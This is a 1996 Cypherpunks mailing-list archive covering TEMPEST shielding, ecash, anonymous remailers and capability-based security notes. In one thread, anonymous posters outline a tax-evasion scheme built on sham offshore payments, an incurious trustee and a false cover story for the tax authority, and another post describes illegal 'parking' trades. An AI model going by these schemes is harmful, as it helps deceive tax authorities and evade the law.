card), disk write, monitor emission, network comms, etc)

Ciao

JFA
Just curious...





 PGP key ID# C58ADD0D  at: http://w3.citenet.net/users/jf_avon
 Key Fingerprint: 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Sun, 12 May 1996 12:22:41 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605112205.XAA27784@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
>Looks like someone paying offshore for Mr. May to me.  Again, 30%
>withholding requirement unless you intend to hide it. 

You just don't get it, do you. The offshore payment is for licensing
(or computer operations, consulting advice, buying worthless software,
investment in penny stocks, use your imagination...) It has NOTHING
to do with Mr.May. Those payments are something that the (drunk) CEO
decided on and he is completely responsible for it. Why he ordered
all those expensive services before he left on permanent vacation is
anybody's guess.

>The only way to avoid this is to conceal Mr. May's involvement.

Right!

>Also note that payments to an account for which Mr. May is the
>beneficiary can trigger realization in several circumstances.

The beneficiary is a trustee that doesn't ask too many questions.
There are plenty of those available.

>You also fail to mention the reporting requirements for U.S. citizens
>holding offshore assets of significant size.

"Laws are for people who can't think for themselves."

>Either it is a tax avoidance plan, or it is a tax evasion plan.
>Which is it?

A little of both, to confuse the enemy.

>Practically speaking I think you have merely altered the plan to
>adjust for my comments and are stuck between both fact scenarios now.

Nothing altered. I just didn't explain it in too much detail before.
There are still details left out (like how to find a cooperative CEO,
offshore bank and trustee). This is an extremely cheep setup. For most
high bracket wage earners it could break even in the first month or two.
Once the structure is in place it doesn't cost any more. To stop paying
taxes completely you would need to lower your taxable profile slowly.
If you already have enough money in the bank for your living style, you
could take out a significantly smaller salary. If the tax man asks what
happened to your high income, you explain that you lost your old job and
had to accept a less attractive offer. That can happen to anybody.

>I would think you'd advertize it here if you had anything worth selling

The problem with selling services like this is that any buyer with half
a brain worries that it is a sting operation. Therefore the customers
are mostly friends and acquaintances.

>Off the shelf companies and trusts have their uses but anyone proposing
>to sell a standard tax avoidance/evasion setup off the shelf should
>trigger major alarm bells.

I agree completely. This is not an advertisement, just a chat on the
theory of tax planning in the modern day of worldwide strong encryption.
Today it is easier to communicate with an offshore trustee than it has
ever been before. Just keep your pass phrase away from the tax man and
you'll be fine.

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 12 May 1996 16:58:47 +0800
To: cypherpunks@toad.com
Subject: Re: Again: [hrdware] anti-Tempest video settings
Message-ID: <9605120422.AA10235@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 May 96 at 13:51, Julian Assange wrote:

<technical tips snipped>

> Equipment
> capable of the latter would be extremely complicated and expensive
> to design and produce; 

Even too expensive for entities with the power of taxation?

> I suspect there has been no call for it to
> date, given that if you are dealing with a target who understands
> the risks of van-eck they usually have shielding and or a faraday
> cage.


You have a point for big outfits.  But for small companies or
cypherpunks on a restricted budget, they also know that there is
most likely *no* shielding of any sort...

Regards

jfa

Why is it that govt employees makes the best spouses? Because after
they come back from work, they are not tired and they already read
the newspapers.

 PGP key ID# C58ADD0D  at: http://w3.citenet.net/users/jf_avon
 Key Fingerprint: 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 12 May 1996 16:31:36 +0800
To: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605112205.XAA27784@pangaea.hypereality.co.uk>
Message-ID: <Pine.SV4.3.91.960511233455.14652F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Wage earners - people who are the subjects of W-2 forms - are the class of
individuals who can't benefit from offshore maneuvers.

I believe the entry costs for a reliable offshore structure from a 
reliable vendor - ie, one who keeps up with court cases and the Code of 
Federal Regulations on a daily basis - is $50-100k.  Ok for guys who own 
a Dart Inmdustries, but not the unwashed masses.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 12 May 1996 19:03:33 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: Remailer in a box
Message-ID: <v02120d05adbb38a167ce@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 5/11/96, Matts Kallioniemi wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 17:39 1996-05-10 EDT, E. ALLEN SMITH wrote:
>>Yes, for the cryptographic purposes. It doesn't make much difference
>>on the juristictional end of things - I'd need to locate a UNIX account
>>in another country for that. Hmm... possible.
>>       -Allen
>
>Anybody who want's an anonymous shell account in Sweden, send me MTB ecash
>and I'll get an account opened for you with a local ISP. Sweden has the best
>Internet access outside North America. A 34 Mbps line to the US, soon to be
>upgraded to 155 Mbps!

May I suggest convincing that Swedish ISP to offer up a signup form
accepting Ecash?


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 12 May 1996 19:02:41 +0800
To: Jüri Kaljundi <cypherpunks@toad.com, E$ mailing list <e$@thumper.vmeng.com>
Subject: Re: distinctive properties of ecash, netbill, cybercash and iKP
Message-ID: <v02120d06adbb39248694@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:40 5/11/96, Jüri Kaljundi wrote:

>This is one question why the central bank in Estonia (I am not sure about
>other countries) does not allow issuing e-cash here in Estonia. While the
>banks issue e-cash to people, they get some real cash from people.  This
>leads to actually doubleing the money in circulation, each monetary unit,
>either dollar or kroon, can at the same time be used by owner of e-cash
>and at the same time by the bank. The central banks are afraid that when
>the amount of e-cash in circulation gets big, this could lead to
>devalvation of money, especially a small country like Estonia is afraid of
>such development.

That's simply silly. The same argument would hold true for travelers
checks. Are Estonian banks allowed to issue them? I thought so.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 12 May 1996 18:59:49 +0800
To: perry@piermont.com
Subject: Re: found nym-differentiation! Still need perpetual motion, FTL travel, coldfusion
Message-ID: <v02120d07adbb3f930991@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:02 5/11/96, Perry E. Metzger wrote:

>I doubt that will work even were it implemented. Every phone on the
>planet and terminal would need to constantly do biometric analysis of
>every user, and even then people could program their terminals to lie.

Telling your terminal to lie will be rather difficult once the CPU refuses
to run an OS with out propper signatures. The OS in turn won't run
applications without such signatures. All commercial software has to
undergo code review by CAs. Your machine won't even run anything but
approved software. Should you think about keeping an old machine around
that does, my advice would be: don't. At least not unless you are willing
to face the ten years prison term mandatory for such a computer crime.

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 12 May 1996 18:56:41 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SV4.3.91.960511233455.14652F-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960512003305.16211B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 11 May 1996, Alan Horowitz wrote:

> Wage earners - people who are the subjects of W-2 forms - are the class of
> individuals who can't benefit from offshore maneuvers.

Not true.  While they may not be able to use offshore techniques
for their wage-slave jobs (though even that isn't always so), 
such techniques can be used to put money beyond the reach of 
their governments, to invest after-tax dollars and to engage in
economic activities which might run afoul of home country laws
and regulations.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 12 May 1996 19:51:38 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SV4.3.91.960511083148.13232B-100000@larry.infi.net>
Message-ID: <Pine.3.89.9605120157.A11750-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 11 May 1996, Alan Horowitz wrote:

> There's no particular need for tax fraud, except by little guys. The big 
> guys have lots of legal techniques. A prime example was the notorious 
> $1000->$100,000 cattle futures transaction that Hillary Rodham Clinto 
> did, just before entering the White House. Clearly, it wasn't an 
> investment: it was a scheme to let some rich Arkansas guy pay a bribe - 
> legally.  A cooperative broker sets up a "short" position and a "long" 
> position on a trade - then the positions get assigned, after the market 
> has made its move, such that the guy "loses" the $100k  and Hillary "has 
> a profit".
> 

The technique is called "parking", and it has been illegal for many 
years. Basically it requires at least 2 people to conduct the "resource 
shifting". Two accounts are established, one takes all losses against a 
commodity and the other gets the wins. This is rolled over almost 
exponetially by "pyramiding" contracts on margin. As such, the person or 
institution who requires the "loss" handles the losing account directly. 
The other account may or may not be handled by the first party, but they 
have access to it, or use an intermediary such as a broker to funnel the 
"wins" accordingly.


...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Sun, 12 May 1996 21:16:04 +0800
To: jf_avon@citenet.net
Subject: Re: Again: [hrdware] anti-Tempest video settings
Message-ID: <2.2.16.19960512030421.3ae77464@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 5/11/96 +0000, you wrote:
>But of course.  But what I want to know is: is there some 
>combination of 
>display colors that will be visible for the eye, but not for the 
>Tempest equipment?  
I am not an electrical engineer and do not play one in real life. However in
my on TEMPEST I heard nothing about varying colors to reduce RF radiation
from a monitor. Just set up a Faraday cage, much simpler.

>That might answer it.  I suppose that if some "stealth" settings 
>exists, they are highly hardware dependent.  
Better to get TEMPEST rated hardware then... check government surplus...
I've had reports of TEMPEST class computer cases being sold with power
supplies real cheap...

>My question was not "would it work in all instances?" but rather
>"had this tactic been implemented successfully in *some* instances?"
Not that I have ever heard... 

Hopefully I am not feeding this troll too much.
>Or, to the contrary, is it reasonable to assume that modern Tempest
equipment can
>work around theses impediments almost all of the time, therefore 
>making any attempts at this futile?
No modern equipment can detect radiation that does NOT leave a Faraday cage.

   Adam, Esq.

-- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
| My PGP key is available on my  |Unauthorized interception violates |
| home page: http://www.rosa.com |federal law (18 USC Section 2700 et|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...see home page...     |communications are preferred for   | 
|     -=[ FUCK THE CDA]=-        |sensitive materials.               |
\=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
If A is a success in life, then A = x + y + z. Work is x; y is play; 
and z is keeping your mouth shut. Albert Einstein (1879-1955)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Mon, 13 May 1996 00:12:37 +0800
To: alan horowitz <cypherpunks@toad.com>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605121210.FAA14392@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Horowitz wrote:
>Wage earners - people who are the subjects of W-2 forms - are the class of
>individuals who can't benefit from offshore maneuvers.

Just go to your boss and tell him that you have an offer from a
consulting company. You'd be happy to continue working for him
until he finds a replacement (which could take decades) for 90%
of your old pre-tax salary. You should get a big smile in return.

>I believe the entry costs for a reliable offshore structure from a 
>reliable vendor - ie, one who keeps up with court cases and the Code of 
>Federal Regulations on a daily basis - is $50-100k.  Ok for guys who own 
>a Dart Inmdustries, but not the unwashed masses.

And I believe that you don't need that. Going to a major offshore
vendor makes you vulnerable to traffic analysis (most of them can't
spell Mixmaster). You can get a better setup for $2999 than you get
if you spend $50k. Or do it yourself for $1k. Start by reading
everything from Scope (www.britnet.co.uk/scope). The books you find
there cover everything you need to know in perfect detail.

Thanks to Philip Zimmermann and Lance Cottrell the balance of power
between the state and the little guy has changed completely. It's
good to see that both of them are going into mass market business.
Perhaps they can get some of the billions of dollars they deserve.

X

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMZWVpFtwWVJrMFYlAQFZ/wgAkqLlArXuoPS9PwM/Zd1fmEg5ttB7xeid
Cmbt+R8Jt53NFITCy1DpbNOTzSdPW4wjSV4HKg6R5TvkcvbxFPA+PzBhzVsgGKdV
GFdYNoIMlbAH5xw6A4+8zsPOeqRDo6WOMccteSctUd8sydCgr/5qw5TfU9aqq5Rq
tawYii4tJ8Za+SiI8PZj6JtljeHplZduTVYmwtOcanFl4/Gi9Zpu/GKXYga+P4ob
rswnh3NDRBHgNDUkn+79lztDGKYoTLhif+Ayem4aFoOjjiIM4QLg61teSw0zxTeH
zJ2c623rI/2XaaqFmiXguHIKSNDLKq5obqJ0PhmnTI577Xz8TvzbrQ==
=jC/p
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi (System Daemon)
Date: Sun, 12 May 1996 16:02:58 +0800
To: cypherpunks@toad.com
Subject: Anonymous code name allocated.
Message-ID: <9605120249.AA10423@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have sent a message using the anon.penet.fi anonymous forwarding service.
You have been allocated the code name an611909.
You can be reached anonymously using the address
an611909@anon.penet.fi.

If you want to use a nickname, please send a message to
nick@anon.penet.fi, with a Subject: field containing your nickname.

For instructions, send a message to help@anon.penet.fi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Sun, 12 May 1996 15:28:35 +0800
To: cypherpunks@toad.com
Subject: Reply to anonymous ping.
Message-ID: <9605120249.AA10440@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Your code name is: an611909@anon.penet.fi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 13 May 1996 05:02:57 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: distinctive properties of ecash, netbill, cybercash and iKP
Message-ID: <v02140b01adbbbad37c94@[17.128.201.139]>
MIME-Version: 1.0
Content-Type: text/plain


>
>>
>> Anonymity of monetary transactions is another thing that Bank of Estonia
>> has declared illegal.
>
>Cash is illegal, too!  How does the economy in Estonia work these days?
>Barter?

If you think about it, anonymous cash transactions above a certain limit
($4,000?) are illegal in the United States, too.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 13 May 1996 05:44:08 +0800
To: cypherpunks@toad.com
Subject: Notes from the SF Physical Cypherpunks meeting
Message-ID: <v02140b02adbbbc07c4f6@[17.128.201.139]>
MIME-Version: 1.0
Content-Type: text/plain


Here are my notes -- without significant editing or correction -- from
Saturday's (96.05.11) cypherpunks meeting in Palo Alto.

Discussion of crypto user interfaces (particularly NetScape and e-mail)

-- How to tell user that "installation" not secure in a decent GUI?
-- Expectation of what leaves user machine.
-- Vendor's "shouldn't distinguish products on security: security is the
   bedrock of our industry." (Quote from some industry person who
   was not present to defend this thesis).
-- Someday, there will be a "Word virus that attacks your CyberCash wallet."
-- If the message is insecure with respect to the user's expectation,
   there should be a user-visible window border (or similar): NetScape's
   little key isn't good enough. Did you know that the netscape key
   has 1 tooth for 40-bit, and 2 teeth for 120 bit encryption?
-- Signed code is the new industry meme. Bonded agents who certify
   signed code. Do you know how much bonding costs, and how little
   it offers?
-- Security dialogs need a help button that explains security.
-- Error messages (of all kinds) should have a url that gives more
   info. Can be a file:// or http:// for local help.

Eudora and Netscape will provide S/Mime. PGP is going nowhere,
S/Mime becoming ubiquitous (Eudora, future Netscape)

S/Mimepretty good. 2 Flaws: signature's name is not encrypted. Major
flaw: encryption defaults to 40-bit. No good way to negotiate for
stronger encryption.

c2.org: 90% of all connections are 40-bit RC2.

Need to publish negotiation info so that sender and receiver can agree
on crypto strength.

PGP lost in Eudora/Netscape: ongoing legal problems with Phil Zimmerman.
Strong concern that companies can't use PGP without problems with RSA.
Do they need Viacrypt.

Web of trust: not working. Hard to map an e-mail address to a key.
Hal Finney's Java implementation not sufficient for signature
distribution.

S/Mime will support Verisign. Verisign certificates have "trust"
level: class 1 is untrusted (equivalent to PGP self-signed?)

Next Netscape beta will have five additional non-verisign CA's:

----
Crypto toolkit: need certification for code fragments.

Need "web of trust" for software validation. There will be a zillion
Java applet's out there: how do you know one does what you claim it do?

When will Java signed classes/signed applets be released. Two weeks.
Hmm, Java One conference is in two weeks. Surely a coincidence.

You can sign a class by signing the class file (zip), then archiving
it together with the source and then sign the combined archive.

I think that Stuffit (on the Macintosh) supports signed archives if
PowerTalk is provided.

-----
Norm Hardy talked about the E programming language from Electric
communities.  (Java with capabilities).

[[These are notes, and occasionally incoherent, for which I
humbly apologize.]]

Capabilities. Should be able to import code and run it even when you
don't trust the code.  Java-type scheme can succeed. No short
description. Here are some of the reasons you should believe it:

-- History: late 50's Algol 60. Code shouldn't be able to escape
it's storage. Compilers and hardware thought this was not sufficiently
important to do this. Not implemented on actual compilers or hardware
(hmm, Burrows 5000, Basic timesharing systems offer counter-examples).
Intent was to be neat and modular, not to be secure against intruders.

Garbage collectors forced better, formal, theory of storage. Gave us
storage security. Multics gave cross-trust subroutine calls.

KEYCOS Started in TimeShare, early 1970's. Ran customers (competitors)
on the same machine. Machine code didn't get in other people's way.
Customers needed to interact. NCSC (part of NSA) looked at this,
recommended B3 rating. Archtecture was good for A1 (next to top, as
good as it comes). Needed rewriting by cleared people, needed formal
proofs. NSA judging systems to protect NSA secrets.

Main idea: programs have rapid communication, with strong security
properties that they themselves arrange. HYDRA earliest system
(Bill Wulf). KEYCOS improved on HYDRA.

Capability: designates something and conveys authority to that thing
Can't pull this apart: can't access without having capability. Can't
get information, can't affect its state. No specific superuser state:
privileged programs have different set of capabilities, not necessarily
all. COM e-mail/bbs system (Sweden) -- operator could backup e-mail, but
not read it.

Object oriented programming system is a capability system.

Crypto (public-private key) similar to capabilities. Public key is
a capability. Private key is the thing that the key designates.

Access lists: people access data. However, it's really the computer
program that accesses the data on the person's behalf.

Access control lists (VMS, Mac filesharing) -- more prevalent than
you might expect, but can be made unobtrusive. Few people notice
that Mac filesharing has access control lists.

Contraxt Unix and capability system. On Unix, programmer gives a
filename to the shell, shell tells the compiler. Compiler opens the file.

Capability: give "read" capability to shell, shell gives it to compiler.
Compiler uses capability to access data.  Cannot hide capability from
programmer. When you build something (create something), you have to
present a "space bank" (sub-pool). You can buy space bank, determine
the amount of free space, zap parts of it, etc.

Money object: can do in Java -- two classes: mint, pot. Pot has two
private fields, mint reference, value. Pot method: produce a sibling
pot with same mint object and no value. Transfer -- if two pots refer to
the same mint, transfer value between them.

I own program, you own data. I don't trust your data, you don't trust my
program. I want to allow you to run your data on my program. Factory
(mutually trusted). Give access to code to factory. Give you access to
factory. You invoke factory, factory creates object that can execute code
on data, but lacks capability to send data.

Capability architectures (narrower sense): for A to affect B,
necessary and sufficent for A to have capability for B.

Can't add onto Unix since old, non-capability mechanisms are still there.

Get capabilities two ways: create object, gets ownership to message.
Can pass capability in a message.

Give to subcontractor only narrow capabilities it needs. Build system so
capabilities can be very narrow. Can grant capability "Q := zero" --
receiver executes capability, but never know name of variable.
Algol call by name -- caller passes a "thunk" to the subroutine. Subroutine
executes the thunk that carries out the caller's computation.

Debugger subject to same capability restrictions.

Keeper -- computational resources become capabilities -- meters grant
ability to use cpu time. Meter has "amount of ticks" -- when hits zero,
task is suspended. Attached to another program with role of meter
keeper. Meter keeper can decide to replenish meter.

Can allocate budget (rate-based) -- useful for real-time app's.
Jewel manual (agorics web site). Market-based control Scott Clearwater.
Fractional (Fractal) reserve bank.  http://www.agorics.com/agorics.

Can grant subsets of own capabilities. Can (by prior arrangement)
revoke capabilities. Language-based vs OS based. Can run large parts
of o.s. in capability model. Get some advantages, but there are pitfalls.

Capability systems can protect against denial of service. Can
administrate cpu/space usage. Language-based systems can message
across trust boundaries quickly. O.S. based may need many machine
cycles.  Crypo-based capability may need millions (exponent).

----

Marianne Mueller.  Reported on Java Security Workshop.

[[Dumb jokes self-censored to protect the guilty.]]

Java team interested in security -- nobody is specifically Mr. Security.
Everybody's responsiblity.

1st Morning. Status + foodfight: Steve Bellovin: Java is a virus. Venting.
We all got minimal trusted computing base (with verifying, formally)
religion. Need better formal model of the language. with better
specificiation, can get better testing. Need better test suites to ensure
that Microsoft implements the same model as Netscape.

VM spec, language spec, also working on policy spec (what the sandbox
policy actually is). Funding an outside security group.

1st Afternoon. Paul Karger, Mark Schaffer. How to use capabilities with
Java. "If you do capabilities, make sure it does these 15 properties. "

2nd Morning. Proposal to do code signing. Afternoon, continued to discuss
code signing and key management. Discussed trust models. Butler Lamson and
Ron Rivest paper on Rivest's home page (on capabilities). Lamson now
working for Microsoft.  IEEE symposium on security and privacy. Security
theory people. Princeton stuff. Security folk all over the Princeton folk
-- think they're just a bunch of hackers.  Java folk impressed; find
Princeton stuff useful.

Working on crypto API's. Sun lobbying govenment to free crypto API's.

Signing classes, applets, applications (application is classes + data).

Microsoft coming out this summer.

Code signing very important. Needs very soon.

Hard to do real capabilities on Java. Transitive closure is very difficult.

-----
Transcribed in real-time by

Martin Minow
minow@apple.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Sun, 12 May 1996 18:57:26 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Remailer in a box
Message-ID: <2.2.32.19960512073424.0091dd8c@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 00:24 1996-05-12 -0700, Lucky Green wrote:
>May I suggest convincing that Swedish ISP to offer up a signup form
>accepting Ecash?

They probably will once the Post Bank gets going with ecash. Until then
there are legal difficulties. Swedish online merchants can't even accept
credit cards. They need an order in hand writing or voice before they
can charge the card.

My offer was to open an account with any ISP, whether they accept ecash
or not. I think that improves the anonymity of the account.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Mon, 13 May 1996 06:11:30 +0800
To: minow@apple.com (Martin Minow)
Subject: Re: Notes from the SF Physical Cypherpunks meeting
In-Reply-To: <v02140b02adbbbc07c4f6@[17.128.201.139]>
Message-ID: <199605121701.KAA16317@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> c2.org: 90% of all connections are 40-bit RC2.

	The number is 94.5%, and it's RC4, not RC2. RC2 is not in any
SSLv2 products.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 12 May 1996 20:03:57 +0800
To: perry@piermont.com
Subject: Re: found nym-differentiation! Still need perpetual motion, FTL travel, cold fusion
In-Reply-To: <199605112302.TAA07610@jekyll.piermont.com>
Message-ID: <199605120836.KAA15055@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself "Perry Metzger" <perry@piermont.com> is alleged to
 have written:
(> Bryce wrote:)

> > Simple as pie, because of some of the properties of DC-Nets.
> > If someone sends out the wrong number of pubkeys, then
> > everyone will know, right?  So when that happens everyone
> > just reveals their shared-secret data from the DC-Net
> > session.
> 
> And if several people lie about their shared secrets?


If some of your N participants are going to collude to share
their nyms then it is manifestly impossible to stop them.
But that doesn't bother me.  The purpose of this scheme is
to create N nyms for N people and be sure that each of then 
N people who wanted a nym got one.  If you are sure that 
each of the N people wanted a nym, then you can be sure you 
have a one-to-one mapping between people and nyms, but
unconditional untraceability from nyms to people.


But perhaps what you were talking about was a
denial-of-service attack on the DC-Net's network layer.
That has been addressed extensively in Chaum's original
"Dining Cryptographers" paper.  Chaum's method for dealing
with denial-of-service attacks is typically brilliant, but
even so it is an unwieldly and expensive (in terms of
computation and bandwidth) proposition.  I recommend "Dining
Cryptographers" to everyone, and I hope that someone who
reads it will come up with a better solution.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZWjDEjbHy8sKZitAQEjvAMAq2wCpK+yGUf21bASjiaOYDAPNF8C/ogn
HAqVnOYmYQMLUTqff7E+oC8uyUj+uoaQ0Fev8uzQdZZROXtbXx+Ej7gBzBFDrbp1
9mohBEWgbYS28hJH9+X3aoyYm/9wT+HX
=xA+6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Mon, 13 May 1996 04:23:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <9605121608.AA04469@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:58 PM 5/9/96 -0700, you wrote:
>For every proposed "ratings" system that involves value judgments about who
>should see something, I can think of examples where a quite opposite view
>is held.

        Yes, but it is possible to have "descriptive" systems. Of course, to
make them easy, things are aggregated into groups, and these groupings have
a value judgement. But it is possible to have rating systems that don't tell
you diddley about who sees it. 
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Mon, 13 May 1996 04:47:58 +0800
To: "E. ALLEN SMITH" <blancw@microsoft.com
Subject: Re: self-ratings vs. market ratings
Message-ID: <9605121608.AA04472@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 06:04 PM 5/10/96 EDT, E. ALLEN SMITH wrote:
>From:   IN%"blancw@MICROSOFT.com"  "Blanc Weber" 10-MAY-1996 16:21:20.63
>
>>The more automated that filtering becomes, so that the viewer (be it an
>>adult or a child) requires less and less personal involvement in
>>evaluating what is appropriate (or even interesting) for themselves, the
>>more weak & piddly (ignorant & psychologically dependent) those people
>>could become, falling into the habit of having others - or an automatic
>>robocop -

        I was talking about this with one of the other students giving the
presentation on RSACi yesterday at Sloan. I was argueing how vice tends to
be associated with radicalism and how it seems to break people out of their
exclusive communities... (nevermind, it was a weird complex discussion.)

Regardless, I ran a roundtable on a topic similar to this. The problem of
information sharing agents evolving into exclusive communities over time. 
        
_______________________________________________
Date: Wed, 14 Feb 1996 20:25:20 -0500
To: roundtable@rpcp.mit.edu
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Roundtable 2/21: M. Van Alstyne - COMMUNICATION NETWORKS AND
  THE RISE OF AN INFORMATION ELITE

 COMMUNICATION NETWORKS AND THE RISE OF AN INFORMATION ELITE
            Do Computers Help the Rich Get Richer?
                       
                     Marshall Van Alstyne
                      (MIT Sloan School)
      
                     CAMBRIDGE ROUNDTABLE
                    Wed, Feb. 21, at 1:00 
                           E40-212

Several researchers have suggested that information resources are not
created equal and that information processing capacity is not distributed
uniformly.  In 1995, for example, only 17% of the adult population in the
US and Canada, roughly 35 million people had any form of access to
electronic services.  But what if access were universal?  If each
enterprise and individual were granted a digital portal onto a National
Information Infrastructure, would equal access to channels mean equal
access to information?

One unfortunate answer is no.  Circumstances exist under which a
telecommunications policy of universal access could lead to an increase in
the gap between the information "haves" and the "have-nots." Policy needs
to provide incentives for information sharing and not just access to
channels, otherwise results might be reversed from those originally
intended.

We present a formal theory of information sharing in groups which shows why
the information rich might get richer still, why there might be
balkanization of groups on the internet, why different objectives within a
group will motivate sharing or shut it down, and why it's not just what you
know but whom you know.  One of the advantages of the model is that there
are several explicit parameters that can be altered to illustrate different
effects of different policies.

For anyone who is interested, the first draft of the paper is available
from URL:  http://web.mit.edu/marshall/www/home.html



_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
